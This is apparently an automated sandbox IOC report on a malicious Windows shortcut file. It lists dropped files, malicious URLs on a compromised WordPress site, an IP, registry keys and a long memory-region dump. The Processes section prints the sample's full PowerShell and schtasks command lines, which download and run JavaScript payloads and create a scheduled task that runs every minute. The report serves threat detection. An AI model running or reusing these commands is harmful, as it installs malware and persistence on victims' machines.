IOC Report
yT6gJFN0SR.lnk

loading gif

Files

File Path
Type
Category
Malicious
yT6gJFN0SR.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
initial sample
malicious
C:\ProgramData\NDU462JA8L5M.js
ASCII text, with very long lines (398)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l3cetix.htr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspxuzhl.pkd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuf5hhli.zqz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_goh4mvnq.uuo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixtlxc5b.imn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lt0wqamh.l4h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0mxhpsr.ain.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0wtyxfu.ek2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\epZTzlYAtsWrS0.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GTQLE48L41EUFM4ZQLOG.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\be35910bcc426105.customDestinations-ms (copy)
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.italialife24.it
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
46.254.34.201
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
46.254.34.201
malicious
https://www.italialife24.it/wp-content
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/a
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
46.254.34.201
malicious
https://www.italialife24.it/wp-c
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/au
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/Pester/Pester
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv
unknown
https://go.micros
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
unknown
https://aka.ms/pscore68
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://oneget.org
unknown
http://italialife24.it
unknown
http://www.italialife24.it
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
italialife24.it
46.254.34.201
malicious
www.italialife24.it
unknown
malicious

IPs

IP
Domain
Country
Malicious
46.254.34.201
italialife24.it
Italy
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1F1B22BC000
heap
page read and write
2285203C000
trusted library allocation
page read and write
7FFB1E102000
unkown
page readonly
178C47DA000
trusted library allocation
page read and write
4E3E0FF000
stack
page read and write
7FFAAC830000
trusted library allocation
page read and write
207AC0BB000
trusted library allocation
page read and write
D1F33CF000
stack
page read and write
E19F8FE000
stack
page read and write
7FFAAC7A0000
trusted library allocation
page execute and read and write
1F1B2312000
heap
page read and write
207ABE90000
heap
page readonly
7FFAAC740000
trusted library allocation
page read and write
207AA076000
heap
page read and write
1F1B22EE000
heap
page read and write
77E207E000
stack
page read and write
207BC031000
trusted library allocation
page read and write
1E4E6B60000
heap
page read and write
22868EF1000
heap
page read and write
1F1B2312000
heap
page read and write
178C1294000
heap
page read and write
178C1200000
heap
page readonly
D1F330D000
stack
page read and write
1B95671A000
heap
page read and write
7FFAAC841000
trusted library allocation
page read and write
207AC020000
heap
page read and write
178C3E1C000
trusted library allocation
page read and write
77E1C7E000
stack
page read and write
2284EBA0000
heap
page read and write
7FFAAC766000
trusted library allocation
page execute and read and write
1FB69665000
heap
page read and write
1FB69669000
heap
page read and write
D1F34CD000
stack
page read and write
75399A000
stack
page read and write
22868A80000
trusted library allocation
page read and write
1FB69682000
heap
page read and write
7FFAAC8E0000
trusted library allocation
page read and write
1B9566F6000
heap
page read and write
178C4E0E000
trusted library allocation
page read and write
873594B000
stack
page read and write
1B9566FD000
heap
page read and write
7FFAAC880000
trusted library allocation
page execute and read and write
1E4E6D80000
heap
page read and write
1E4DEAE3000
trusted library allocation
page read and write
46EE13B000
stack
page read and write
1FB69646000
heap
page read and write
7FFB23A72000
unkown
page readonly
7FFAAC9C0000
trusted library allocation
page read and write
7FFAAC9D0000
trusted library allocation
page read and write
5B244FE000
stack
page read and write
1F1B22E0000
heap
page read and write
2284EE90000
heap
page read and write
22868BFE000
heap
page read and write
77E2BCD000
stack
page read and write
207AD73D000
trusted library allocation
page read and write
1B9566F8000
heap
page read and write
1B95672A000
heap
page read and write
1E4D0075000
trusted library allocation
page read and write
1E4D0067000
trusted library allocation
page read and write
1E4D007B000
trusted library allocation
page read and write
2285167C000
trusted library allocation
page read and write
207A9F70000
heap
page read and write
1B956722000
heap
page read and write
D1F24BE000
stack
page read and write
22852324000
trusted library allocation
page read and write
1B956723000
heap
page read and write
1F89123A000
heap
page read and write
22868C3C000
heap
page read and write
1F89124F000
heap
page read and write
7FFAAC850000
trusted library allocation
page execute and read and write
1E4CCA70000
heap
page read and write
7FFAAC8B5000
trusted library allocation
page read and write
1F1B2303000
heap
page read and write
1E4CCB52000
heap
page read and write
1F1B2312000
heap
page read and write
207AA080000
heap
page read and write
1E4CEC9C000
trusted library allocation
page read and write
207C4416000
heap
page read and write
207A9F40000
heap
page read and write
178C2CA5000
heap
page read and write
207AA0C0000
heap
page read and write
1D167FF2000
heap
page read and write
178C31B0000
heap
page execute and read and write
1FB6969D000
heap
page read and write
207AD68F000
trusted library allocation
page read and write
22852056000
trusted library allocation
page read and write
D1F2478000
stack
page read and write
1F891270000
heap
page read and write
E61E6FF000
stack
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
77E217B000
stack
page read and write
1F891245000
heap
page read and write
7FFAAC694000
trusted library allocation
page read and write
1B95671A000
heap
page read and write
1B956712000
heap
page read and write
753FFE000
stack
page read and write
2285229E000
trusted library allocation
page read and write
24648A60000
heap
page read and write
46EDBFF000
stack
page read and write
1FB6966B000
heap
page read and write
1E4CEAE7000
trusted library allocation
page read and write
7FFAAC8C5000
trusted library allocation
page read and write
7FFAAC880000
trusted library allocation
page execute and read and write
24BB4C18000
heap
page read and write
22852086000
trusted library allocation
page read and write
178DB3A5000
heap
page read and write
1FB69693000
heap
page read and write
3CA5BBE000
stack
page read and write
1D16819E000
heap
page read and write
7FFAAC862000
trusted library allocation
page read and write
7FFAAC750000
trusted library allocation
page execute and read and write
7FFAAC930000
trusted library allocation
page read and write
3FFF7FC000
stack
page read and write
7FFAAC68D000
trusted library allocation
page execute and read and write
22868E90000
heap
page read and write
E19F4FA000
stack
page read and write
7FFB22760000
unkown
page readonly
3CA58FD000
stack
page read and write
7FFAAC940000
trusted library allocation
page read and write
7FFAAC8D0000
trusted library allocation
page read and write
1B95671A000
heap
page read and write
207ADC9E000
trusted library allocation
page read and write
178D3201000
trusted library allocation
page read and write
7FFAAC9A0000
trusted library allocation
page read and write
1F1B22E6000
heap
page read and write
7FFAAC9D0000
trusted library allocation
page read and write
7FFAAC690000
trusted library allocation
page read and write
1B956722000
heap
page read and write
1D167E50000
heap
page read and write
1D167FE7000
heap
page read and write
2284EE10000
trusted library allocation
page read and write
7FFB23A75000
unkown
page readonly
77E20FF000
stack
page read and write
1FB69689000
heap
page read and write
1E4E6ABE000
heap
page read and write
3CA5AB8000
stack
page read and write
1F1B2306000
heap
page read and write
178C4A6D000
trusted library allocation
page read and write
1B9565C5000
heap
page read and write
2284EF60000
heap
page read and write
7FFAAC84A000
trusted library allocation
page read and write
178DB389000
heap
page read and write
1E4CF69C000
trusted library allocation
page read and write
1B9566DE000
heap
page read and write
207AC031000
trusted library allocation
page read and write
4E3D8F9000
stack
page read and write
46EDC7E000
stack
page read and write
207C4280000
heap
page read and write
1E4CCAFA000
heap
page read and write
1E4CCAB8000
heap
page read and write
1E4CCAAE000
heap
page read and write
24BB4B50000
heap
page read and write
7FFAAC683000
trusted library allocation
page execute and read and write
1E4E6A70000
heap
page read and write
1D167F30000
heap
page read and write
D1F2073000
stack
page read and write
207C4036000
heap
page read and write
22868BD9000
heap
page read and write
1F891219000
heap
page read and write
24648AA0000
heap
page read and write
7FFB1E105000
unkown
page readonly
1E4CE703000
trusted library allocation
page read and write
7FFAAC9C0000
trusted library allocation
page read and write
2284EC97000
heap
page read and write
2284EC5B000
heap
page read and write
1D168012000
heap
page read and write
7542FE000
stack
page read and write
178C4A42000
trusted library allocation
page read and write
D1F2537000
stack
page read and write
207C42A0000
heap
page read and write
1FB69665000
heap
page read and write
1B956690000
heap
page read and write
1FB696A7000
heap
page read and write
7FFAAC8B0000
trusted library allocation
page read and write
22860AC3000
trusted library allocation
page read and write
22868F15000
heap
page read and write
24648A40000
heap
page read and write
1B95671E000
heap
page read and write
7FFAAC960000
trusted library allocation
page read and write
1D167FE7000
heap
page read and write
46EDE37000
stack
page read and write
1F1B24B5000
heap
page read and write
178C1505000
heap
page read and write
1B956725000
heap
page read and write
7FFB22779000
unkown
page readonly
1D167F90000
heap
page read and write
178C11F0000
trusted library allocation
page read and write
1FACEA30000
heap
page read and write
7FFAAC940000
trusted library allocation
page read and write
7FFB1E100000
unkown
page read and write
7FFB22761000
unkown
page execute read
1FB696A6000
heap
page read and write
D1F237E000
stack
page read and write
7FFB1E100000
unkown
page read and write
7FFB1E102000
unkown
page readonly
1D167F99000
heap
page read and write
D0BFBF000
stack
page read and write
77E1E78000
stack
page read and write
7FFAAC776000
trusted library allocation
page execute and read and write
1F1B20F0000
heap
page read and write
77E17AE000
stack
page read and write
46EDAFE000
stack
page read and write
1D167FF0000
heap
page read and write
1E4E6DB4000
heap
page read and write
2284EF00000
heap
page execute and read and write
1B956722000
heap
page read and write
E19F9FF000
stack
page read and write
7FFAAC872000
trusted library allocation
page read and write
7FFAAC8A0000
trusted library allocation
page read and write
7FFB23A51000
unkown
page execute read
7FFAAC870000
trusted library allocation
page execute and read and write
24BB4C10000
heap
page read and write
1B9566A8000
heap
page read and write
7FFAAC8D0000
trusted library allocation
page read and write
207C422C000
heap
page read and write
1E4E6AF7000
heap
page read and write
1B9566EF000
heap
page read and write
7FFAAC8F0000
trusted library allocation
page read and write
46ED743000
stack
page read and write
D1F217E000
stack
page read and write
1FB69646000
heap
page read and write
3FFF4FD000
stack
page read and write
3CA5362000
stack
page read and write
7FFAAC9B0000
trusted library allocation
page read and write
178C31E0000
heap
page execute and read and write
1E4E6AA6000
heap
page read and write
1B9566F6000
heap
page read and write
7FFAAC832000
trusted library allocation
page read and write
1B9566F6000
heap
page read and write
1B9565C0000
heap
page read and write
3CA684F000
stack
page read and write
7FFAAC990000
trusted library allocation
page read and write
3CA5B3E000
stack
page read and write
207C42A2000
heap
page read and write
1F1B24B0000
heap
page read and write
752868B000
stack
page read and write
1B9564C0000
heap
page read and write
7FFAAC83A000
trusted library allocation
page read and write
207AD952000
trusted library allocation
page read and write
2284EC10000
heap
page read and write
2285266B000
trusted library allocation
page read and write
178DB380000
heap
page read and write
22868C8C000
heap
page read and write
46EEB8E000
stack
page read and write
207ABED0000
trusted library allocation
page read and write
7FFAAC9D0000
trusted library allocation
page read and write
1D167FC7000
heap
page read and write
1FB6965F000
heap
page read and write
22851D90000
trusted library allocation
page read and write
207AA330000
heap
page read and write
7FFAAC880000
trusted library allocation
page read and write
178C47E6000
trusted library allocation
page read and write
7FFAAC980000
trusted library allocation
page read and write
1F1B22C7000
heap
page read and write
178C4800000
trusted library allocation
page read and write
1B95671E000
heap
page read and write
21C7DAF5000
heap
page read and write
7FFAAC925000
trusted library allocation
page read and write
1FB69665000
heap
page read and write
1FB69692000
heap
page read and write
1FB6B380000
heap
page read and write
22852043000
trusted library allocation
page read and write
7FFAAC692000
trusted library allocation
page read and write
207AD728000
trusted library allocation
page read and write
46EEB0E000
stack
page read and write
22868C77000
heap
page read and write
178C1500000
heap
page read and write
7FFAAC950000
trusted library allocation
page read and write
7FFAAC8C0000
trusted library allocation
page read and write
1E4CE340000
trusted library allocation
page read and write
2284EC18000
heap
page read and write
7FFAAC693000
trusted library allocation
page execute and read and write
7FFB1E102000
unkown
page readonly
207C4390000
heap
page execute and read and write
E19F5FD000
stack
page read and write
22868EFD000
heap
page read and write
207AD67C000
trusted library allocation
page read and write
7FFB23A70000
unkown
page read and write
1F891110000
heap
page read and write
1E4CCAB4000
heap
page read and write
1D167FBB000
heap
page read and write
7FFB1E0E1000
unkown
page execute read
2284EE70000
heap
page execute and read and write
178D33A1000
trusted library allocation
page read and write
7FFB22761000
unkown
page execute read
1E4DEA81000
trusted library allocation
page read and write
1B956712000
heap
page read and write
7FFAAC890000
trusted library allocation
page read and write
7FFAAC920000
trusted library allocation
page read and write
1F891247000
heap
page read and write
1E4CCAF7000
heap
page read and write
7FFAAC9A0000
trusted library allocation
page read and write
7FFAAC9E0000
trusted library allocation
page read and write
1E4DEC19000
trusted library allocation
page read and write
1E4CE9B0000
heap
page execute and read and write
24648B1D000
heap
page read and write
46EDCFE000
stack
page read and write
207A9FB0000
heap
page read and write
1E4E6D72000
heap
page read and write
7FFAAC694000
trusted library allocation
page read and write
1E4CCA40000
heap
page read and write
178C2B50000
trusted library allocation
page read and write
1FACEB10000
heap
page read and write
1F8912B9000
heap
page read and write
1F891310000
heap
page read and write
1E4E6DB7000
heap
page read and write
178C1050000
heap
page read and write
1F1B2303000
heap
page read and write
7FFB1E0E1000
unkown
page execute read
7FFAAC930000
trusted library allocation
page read and write
1FB6964E000
heap
page read and write
22868D60000
heap
page read and write
22868F37000
heap
page read and write
1F1B2303000
heap
page read and write
207BC1E3000
trusted library allocation
page read and write
7FFAAC841000
trusted library allocation
page read and write
1F1B22AC000
heap
page read and write
178C47FA000
trusted library allocation
page read and write
46EE03E000
stack
page read and write
22860A51000
trusted library allocation
page read and write
3CA5D3C000
stack
page read and write
7FFB23A66000
unkown
page readonly
7FFAAC850000
trusted library allocation
page execute and read and write
22868BD0000
heap
page read and write
22868BED000
heap
page read and write
7FFAAC860000
trusted library allocation
page execute and read and write
46EDEB9000
stack
page read and write
7FFAAC860000
trusted library allocation
page execute and read and write
1B9566A0000
heap
page read and write
E19FFFB000
stack
page read and write
3CA59BE000
stack
page read and write
7FFAAC900000
trusted library allocation
page read and write
1FB6969A000
heap
page read and write
178C2B99000
heap
page read and write
24648C65000
heap
page read and write
3FFF3FF000
stack
page read and write
7FFAAC693000
trusted library allocation
page execute and read and write
1E4D02EE000
trusted library allocation
page read and write
2284EDE0000
heap
page read and write
7FFAAC970000
trusted library allocation
page read and write
1F891247000
heap
page read and write
E61E0F9000
stack
page read and write
1B959EE0000
trusted library allocation
page read and write
1B9566C1000
heap
page read and write
1E4CE320000
trusted library allocation
page read and write
1E4CE385000
heap
page read and write
7FFAAC840000
trusted library allocation
page execute and read and write
7FFAAC736000
trusted library allocation
page read and write
1FB69698000
heap
page read and write
5B240FE000
stack
page read and write
178DB650000
heap
page read and write
8735C7F000
stack
page read and write
22852045000
trusted library allocation
page read and write
1F892B70000
heap
page read and write
7FFAAC9E0000
trusted library allocation
page read and write
7FFAAC9C0000
trusted library allocation
page read and write
7FFAAC73C000
trusted library allocation
page execute and read and write
1FB69682000
heap
page read and write
1E4CC8F0000
heap
page read and write
7FFAAC960000
trusted library allocation
page read and write
3FFEBBA000
stack
page read and write
46EDA7E000
stack
page read and write
178C4ABC000
trusted library allocation
page read and write
1B958370000
heap
page read and write
D1F27BB000
stack
page read and write
1E4CE9B7000
heap
page execute and read and write
21C7D748000
heap
page read and write
24648AD8000
heap
page read and write
7540FF000
stack
page read and write
D1F20FD000
stack
page read and write
1FB695C0000
heap
page read and write
1D169D70000
heap
page read and write
7FFB23A70000
unkown
page read and write
1B956722000
heap
page read and write
7FFAAC750000
trusted library allocation
page execute and read and write
207AD72C000
trusted library allocation
page read and write
1FB696A6000
heap
page read and write
7FFAAC7B0000
trusted library allocation
page execute and read and write
8F682FF000
stack
page read and write
1F1B2313000
heap
page read and write
24648960000
heap
page read and write
7FFB22785000
unkown
page readonly
D1F263E000
stack
page read and write
1FB696A6000
heap
page read and write
E61E1FF000
stack
page read and write
7FFAAC68D000
trusted library allocation
page execute and read and write
7FFAAC8F0000
trusted library allocation
page read and write
2285266F000
trusted library allocation
page read and write
7FFAAC8E0000
trusted library allocation
page read and write
178C1210000
heap
page read and write
7FFAAC831000
trusted library allocation
page read and write
207AA335000
heap
page read and write
7FFAAC69B000
trusted library allocation
page read and write
24E3A845000
heap
page read and write
2284ECE1000
heap
page read and write
46EDB7D000
stack
page read and write
8F6827F000
unkown
page read and write
1FB69631000
heap
page read and write
1FB696A6000
heap
page read and write
77E1DF7000
stack
page read and write
1F891350000
heap
page read and write
1FB69618000
heap
page read and write
1F1B230A000
heap
page read and write
7FFAAC684000
trusted library allocation
page read and write
4E3DFFF000
stack
page read and write
178C4A6F000
trusted library allocation
page read and write
207ABE80000
trusted library allocation
page read and write
7FFAAC8A0000
trusted library allocation
page read and write
1F1B230A000
heap
page read and write
22850AC5000
trusted library allocation
page read and write
2284EC51000
heap
page read and write
2284EC53000
heap
page read and write
22868E40000
heap
page execute and read and write
22868C13000
heap
page read and write
7FFB22760000
unkown
page readonly
7FFB23A72000
unkown
page readonly
207AA008000
heap
page read and write
1F1B23F0000
heap
page read and write
1D167FC0000
heap
page read and write
1B95671A000
heap
page read and write
207ADC9A000
trusted library allocation
page read and write
1F1B22C7000
heap
page read and write
7FFAAC970000
trusted library allocation
page read and write
1E4CEA60000
heap
page execute and read and write
1FB69689000
heap
page read and write
207C4140000
heap
page read and write
7FFAAC692000
trusted library allocation
page read and write
2284EBC0000
heap
page read and write
24648C6D000
heap
page read and write
1D167FC5000
heap
page read and write
1B956722000
heap
page read and write
24BB4EC0000
heap
page read and write
77E17EE000
stack
page read and write
1B9566C1000
heap
page read and write
7FFAAC9A0000
trusted library allocation
page read and write
7FFB23A66000
unkown
page readonly
4E3D9FF000
stack
page read and write
1B956712000
heap
page read and write
178C341C000
trusted library allocation
page read and write
178C3111000
heap
page read and write
207ABAB0000
heap
page read and write
7FFAAC830000
trusted library allocation
page read and write
1B95671E000
heap
page read and write
46EDF38000
stack
page read and write
207AB980000
heap
page read and write
7FFAAC740000
trusted library allocation
page read and write
7FFB23A69000
unkown
page readonly
21C7D766000
heap
page read and write
7FFAAC820000
trusted library allocation
page read and write
207AA0C4000
heap
page read and write
7FFAAC872000
trusted library allocation
page read and write
1E4E6A95000
heap
page read and write
1E4D030E000
trusted library allocation
page read and write
3CA680D000
stack
page read and write
1B9566F5000
heap
page read and write
4E3DCFE000
stack
page read and write
178C434B000
trusted library allocation
page read and write
7FFB22780000
unkown
page read and write
178C4AC0000
trusted library allocation
page read and write
178C3074000
heap
page read and write
178C47F4000
trusted library allocation
page read and write
7FFB22776000
unkown
page readonly
1FB694E0000
heap
page read and write
22868EE3000
heap
page read and write
77E1AFE000
stack
page read and write
7FFAAC8D0000
trusted library allocation
page read and write
7FFB1E0E0000
unkown
page readonly
22868C07000
heap
page read and write
7545FB000
stack
page read and write
1D167FEA000
heap
page read and write
1FB6964D000
heap
page read and write
7FFAAC930000
trusted library allocation
page read and write
1F89124F000
heap
page read and write
7FFAAC920000
trusted library allocation
page read and write
21C7D920000
heap
page read and write
1F1B22BB000
heap
page read and write
77E1B7B000
stack
page read and write
24E3A840000
heap
page read and write
207AA04F000
heap
page read and write
207C440B000
heap
page read and write
1B9566D6000
heap
page read and write
1FB6966E000
heap
page read and write
1E4E6D60000
heap
page read and write
1E4CE360000
trusted library allocation
page read and write
1F8912BC000
heap
page read and write
7FFAAC900000
trusted library allocation
page read and write
7FFAAC950000
trusted library allocation
page read and write
1F1B2303000
heap
page read and write
1E4E6DBB000
heap
page read and write
46EDFBF000
stack
page read and write
1D168190000
heap
page read and write
3CA68CF000
stack
page read and write
2285205F000
trusted library allocation
page read and write
7FFAAC682000
trusted library allocation
page read and write
207AD6C5000
trusted library allocation
page read and write
207C421D000
heap
page read and write
178C4A44000
trusted library allocation
page read and write
77E1F7F000
stack
page read and write
7FFB1E0F6000
unkown
page readonly
178C3040000
heap
page read and write
24BB4B80000
heap
page read and write
46ED7CE000
stack
page read and write
207C41C2000
heap
page read and write
1B9566FE000
heap
page read and write
178DB374000
heap
page read and write
1B956739000
heap
page read and write
E61E7FE000
stack
page read and write
D1F328E000
stack
page read and write
178C1190000
heap
page read and write
3CA577D000
stack
page read and write
1FB6CF10000
trusted library allocation
page read and write
7FFAAC850000
trusted library allocation
page execute and read and write
7FFAAC736000
trusted library allocation
page read and write
1E4CCA00000
heap
page read and write
178C304B000
heap
page read and write
D1F227D000
stack
page read and write
2284EE30000
trusted library allocation
page read and write
1F1B22CF000
heap
page read and write
1F1B5A30000
trusted library allocation
page read and write
1E4CEA71000
trusted library allocation
page read and write
7FFB1E0E1000
unkown
page execute read
77E1CFD000
stack
page read and write
207AA07C000
heap
page read and write
178C126E000
heap
page read and write
1E4E6DC6000
heap
page read and write
7FFAAC746000
trusted library allocation
page read and write
1FB6965F000
heap
page read and write
7FFB1E100000
unkown
page read and write
1F1B230A000
heap
page read and write
7FFAAC900000
trusted library allocation
page read and write
178DB362000
heap
page read and write
7FFAAC683000
trusted library allocation
page execute and read and write
22868EFA000
heap
page read and write
178C1130000
heap
page read and write
7FFAAC990000
trusted library allocation
page read and write
1B9566BC000
heap
page read and write
2284EC35000
heap
page read and write
3FFEFFE000
stack
page read and write
1F1B22EC000
heap
page read and write
46EE0BB000
stack
page read and write
207ADBD4000
trusted library allocation
page read and write
178D31F1000
trusted library allocation
page read and write
207C4397000
heap
page execute and read and write
1E4CE350000
heap
page readonly
1F1B22E7000
heap
page read and write
3CA587E000
stack
page read and write
1F89126B000
heap
page read and write
3FFEEFE000
stack
page read and write
207A9FD9000
heap
page read and write
7FFAAC8A0000
trusted library allocation
page read and write
207ABE50000
trusted library allocation
page read and write
7FFB1E105000
unkown
page readonly
207ACC62000
trusted library allocation
page read and write
7FFAAC83A000
trusted library allocation
page read and write
22850C7C000
trusted library allocation
page read and write
178C3265000
trusted library allocation
page read and write
24648AEE000
heap
page read and write
7FFAAC822000
trusted library allocation
page read and write
7FFAAC890000
trusted library allocation
page read and write
2464A590000
heap
page read and write
7FFAAC8F0000
trusted library allocation
page read and write
1FB6B004000
heap
page read and write
3CA53EF000
stack
page read and write
24BB4EC5000
heap
page read and write
E61E2FF000
stack
page read and write
178C125A000
heap
page read and write
1F1B2312000
heap
page read and write
7FFAAC940000
trusted library allocation
page read and write
1FB6B388000
heap
page read and write
7FFB22785000
unkown
page readonly
7FFB1E100000
unkown
page read and write
E19FBFE000
stack
page read and write
7FFAAC862000
trusted library allocation
page read and write
1F89128D000
heap
page read and write
24648AA7000
